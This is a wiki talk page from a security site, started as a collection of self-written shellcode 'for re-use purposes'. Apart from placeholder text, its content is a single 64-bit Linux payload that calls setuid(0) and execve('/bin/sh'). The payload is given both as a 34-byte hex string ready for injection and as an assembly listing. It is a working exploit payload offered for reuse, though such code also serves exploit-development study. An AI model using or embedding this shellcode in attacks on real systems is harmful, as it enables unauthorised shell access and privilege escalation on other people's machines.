Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Category talk:Shellcode"

From NetSec
Jump to: navigation, search
(Created page with "Hey guys, thought we could use some collections of this stuff for re-use purposes. Lets only contribute things we wrote ourselves, no copy pasting others' codes please! ~~~~ ==...")
(No difference)

Revision as of 02:23, 19 August 2012

Hey guys, thought we could use some collections of this stuff for re-use purposes. Lets only contribute things we wrote ourselves, no copy pasting others' codes please! Hatter 05:23, 19 August 2012 (MSK)

Collections

c3el4.png This page needs shellcodes, and will be updated with it shortly.

Thanks for your patience.

Windows

Linux

64-bit

setuid(0); execve('/bin/sh'); - 34 bytes
  • \x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
 
.section .data
.section .text
.globl _start
_start:
 mov $0, %rdi
 mov $105, %rax
 syscall
 
# a function is f(%rdi,%rdx,%rsi)
 mov $59, %rax
                # execve(filename, argv, envp)
 push $0x00
 mov %rsp, %rdx # argv is null
 mov %rsp, %rsi # envp is null
 mov $0x0068732f6e69622f, %rcx
 push %rcx
 mov %rsp, %rdi # filename is '/bin/sh\0'
 syscall
 
 mov $60, %rax
 mov $0, %rdi
 syscall
Retrieved from "http://nets.ec/index.php?title=Category_talk:Shellcode&oldid=8818"